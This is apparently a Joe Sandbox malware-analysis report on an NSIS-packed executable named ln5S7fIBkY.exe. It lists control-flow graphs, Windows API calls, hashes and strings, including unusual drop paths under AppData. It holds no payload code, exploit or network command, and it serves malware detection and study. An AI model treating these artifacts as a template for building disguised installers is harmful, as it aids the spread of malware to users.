                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
                                                                    • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                    • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                    • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                    • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID:
                                                                    • API String ID: 3282139019-0
                                                                    • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                    • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                    • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                    • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 295 403987-40399f call 406671 298 4039a1-4039b1 call 4061de 295->298 299 4039b3-4039ea call 406165 295->299 308 403a0d-403a36 call 403c5d call 405c74 298->308 304 403a02-403a08 lstrcatW 299->304 305 4039ec-4039fd call 406165 299->305 304->308 305->304 313 403ac8-403ad0 call 405c74 308->313 314 403a3c-403a41 308->314 320 403ad2-403ad9 call 4062b9 313->320 321 403ade-403b03 LoadImageW 313->321 314->313 315 403a47-403a61 call 406165 314->315 319 403a66-403a6f 315->319 319->313 322 403a71-403a75 319->322 320->321 324 403b84-403b8c call 40140b 321->324 325 403b05-403b35 RegisterClassW 321->325 326 403a87-403a93 lstrlenW 322->326 327 403a77-403a84 call 405b99 322->327 339 403b96-403ba1 call 403c5d 324->339 340 403b8e-403b91 324->340 328 403c53 325->328 329 403b3b-403b7f SystemParametersInfoW CreateWindowExW 325->329 333 403a95-403aa3 lstrcmpiW 326->333 334 403abb-403ac3 call 405b6c call 406297 326->334 327->326 332 403c55-403c5c 328->332 329->324 333->334 338 403aa5-403aaf GetFileAttributesW 333->338 334->313 343 403ab1-403ab3 338->343 344 403ab5-403ab6 call 405bb8 338->344 348 403ba7-403bc1 ShowWindow call 406601 339->348 349 403c2a-403c2b call 4053d2 339->349 340->332 343->334 343->344 344->334 356 403bc3-403bc8 call 406601 348->356 357 403bcd-403bdf GetClassInfoW 348->357 352 403c30-403c32 349->352 354 403c34-403c3a 352->354 355 403c4c-403c4e call 40140b 352->355 354->340 358 403c40-403c47 call 40140b 354->358 355->328 356->357 361 403be1-403bf1 GetClassInfoW RegisterClassW 357->361 362 403bf7-403c1a DialogBoxParamW call 40140b 357->362 358->340 361->362 366 403c1f-403c28 call 4038d7 362->366 366->332
                                                                    APIs
                                                                      • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                      • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                    • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000), ref: 00403A08
                                                                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                                                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                    • GetFileAttributesW.KERNEL32(: Completed), ref: 00403AA6
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen), ref: 00403AEF
                                                                      • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                    • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                    • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                    • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                    • API String ID: 1975747703-3017370947
                                                                    • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                    • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                    • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                    • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 372 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 40330e 384->387 386->387 396 402f9a-402fa1 387->396 397 4030bc-4030c4 call 402e79 387->397 391 403067-40307f call 403324 call 40330e 388->391 392 403089-4030b3 GlobalAlloc call 403324 call 403116 388->392 389->374 391->389 420 403081-403087 391->420 392->389 418 4030c6-4030d7 392->418 398 402fa3-402fb7 call 405d48 396->398 399 40301d-403021 396->399 397->389 407 40302b-403031 398->407 416 402fb9-402fc0 398->416 406 403023-40302a call 402e79 399->406 399->407 406->407 409 403040-40304a 407->409 410 403033-40303d call 406764 407->410 409->384 417 403050 409->417 410->409 416->407 422 402fc2-402fc9 416->422 417->381 423 4030d9 418->423 424 4030df-4030e4 418->424 420->389 420->392 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d48 426->428 427->407 429 402fdd-402ffd 427->429 432 40310d 428->432 429->389 431 403003-403007 429->431 433 403009-40300d 431->433 434 40300f-403017 431->434 432->374 433->417 433->434 434->407 435 403019-40301b 434->435 435->407
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00402EEE
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ln5S7fIBkY.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                      • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                      • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                    • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ln5S7fIBkY.exe,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ln5S7fIBkY.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                    • API String ID: 4283519449-1106707727
                                                                    • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                    • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                                                    • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                    • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 436 4062b9-4062c4 437 4062c6-4062d5 436->437 438 4062d7-4062ed 436->438 437->438 439 4062f3-406300 438->439 440 406505-40650b 438->440 439->440 443 406306-40630d 439->443 441 406511-40651c 440->441 442 406312-40631f 440->442 445 406527-406528 441->445 446 40651e-406522 call 406297 441->446 442->441 444 406325-406331 442->444 443->440 447 4064f2 444->447 448 406337-406375 444->448 446->445 452 406500-406503 447->452 453 4064f4-4064fe 447->453 450 406495-406499 448->450 451 40637b-406386 448->451 456 40649b-4064a1 450->456 457 4064cc-4064d0 450->457 454 406388-40638d 451->454 455 40639f 451->455 452->440 453->440 454->455 458 40638f-406392 454->458 461 4063a6-4063ad 455->461 459 4064b1-4064bd call 406297 456->459 460 4064a3-4064af call 4061de 456->460 462 4064d2-4064da call 4062b9 457->462 463 4064df-4064f0 lstrlenW 457->463 458->455 465 406394-406397 458->465 474 4064c2-4064c8 459->474 460->474 467 4063b2-4063b4 461->467 468 4063af-4063b1 461->468 462->463 463->440 465->455 470 406399-40639d 465->470 472 4063b6-4063d4 call 406165 467->472 473 4063ef-4063f2 467->473 468->467 470->461 482 4063d9-4063dd 472->482 475 406402-406405 473->475 476 4063f4-406400 GetSystemDirectoryW 473->476 474->463 478 4064ca 474->478 480 406470-406472 475->480 481 406407-406415 GetWindowsDirectoryW 475->481 479 406474-406478 476->479 483 40648d-406493 call 40652b 478->483 479->483 488 40647a 479->488 480->479 485 406417-406421 480->485 481->480 486 4063e3-4063ea call 4062b9 482->486 487 40647d-406480 482->487 483->463 491 406423-406426 485->491 492 40643b-406451 SHGetSpecialFolderLocation 485->492 486->479 487->483 489 406482-406488 lstrcatW 487->489 488->487 489->483 491->492 495 406428-40642f 491->495 496 406453-40646a SHGetPathFromIDListW CoTaskMemFree 492->496 497 40646c 492->497 498 406437-406439 495->498 496->479 496->497 497->480 498->479 498->492
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063FA
                                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,halituses,?,00405336,halituses,00000000), ref: 0040640D
                                                                    • SHGetSpecialFolderLocation.SHELL32(00405336,?,00000000,halituses,?,00405336,halituses,00000000), ref: 00406449
                                                                    • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406457
                                                                    • CoTaskMemFree.OLE32(?), ref: 00406462
                                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                    • lstrlenW.KERNEL32(: Completed,00000000,halituses,?,00405336,halituses,00000000), ref: 004064E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                    • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$halituses
                                                                    • API String ID: 717251189-3468386958
                                                                    • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                    • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                    • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                    • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 563 40176f-401794 call 402c41 call 405be3 568 401796-40179c call 406297 563->568 569 40179e-4017b0 call 406297 call 405b6c lstrcatW 563->569 574 4017b5-4017b6 call 40652b 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 4065da 578->579 580 4017f2-4017f5 578->580 587 4017dd-4017ef 579->587 588 4017cd-4017db CompareFileTime 579->588 582 4017f7-4017f8 call 405d68 580->582 583 4017fd-401819 call 405d8d 580->583 582->583 590 40181b-40181e 583->590 591 40188d-4018b6 call 4052ff call 403116 583->591 587->580 588->587 593 401820-40185e call 406297 * 2 call 4062b9 call 406297 call 4058fd 590->593 594 40186f-401879 call 4052ff 590->594 605 4018b8-4018bc 591->605 606 4018be-4018ca SetFileTime 591->606 593->578 626 401864-401865 593->626 603 401882-401888 594->603 607 402ace 603->607 605->606 609 4018d0-4018db CloseHandle 605->609 606->609 613 402ad0-402ad4 607->613 611 4018e1-4018e4 609->611 612 402ac5-402ac8 609->612 615 4018e6-4018f7 call 4062b9 lstrcatW 611->615 616 4018f9-4018fc call 4062b9 611->616 612->607 622 401901-4022fc call 4058fd 615->622 616->622 622->612 622->613 626->603 628 401867-401868 626->628 628->594
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017B0
                                                                    • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017D5
                                                                      • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                      • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,76F923A0), ref: 0040535A
                                                                      • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsu4D43.tmp$C:\Users\user\AppData\Local\Temp\nsu4D43.tmp$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                    • API String ID: 1941528284-3772663424
                                                                    • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                    • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                    • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                    • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 629 4052ff-405314 630 40531a-40532b 629->630 631 4053cb-4053cf 629->631 632 405336-405342 lstrlenW 630->632 633 40532d-405331 call 4062b9 630->633 635 405344-405354 lstrlenW 632->635 636 40535f-405363 632->636 633->632 635->631 637 405356-40535a lstrcatW 635->637 638 405372-405376 636->638 639 405365-40536c SetWindowTextW 636->639 637->636 640 405378-4053ba SendMessageW * 3 638->640 641 4053bc-4053be 638->641 639->638 640->641 641->631 642 4053c0-4053c3 641->642 642->631
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                    • lstrlenW.KERNEL32(00403257,halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                    • lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,76F923A0), ref: 0040535A
                                                                    • SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
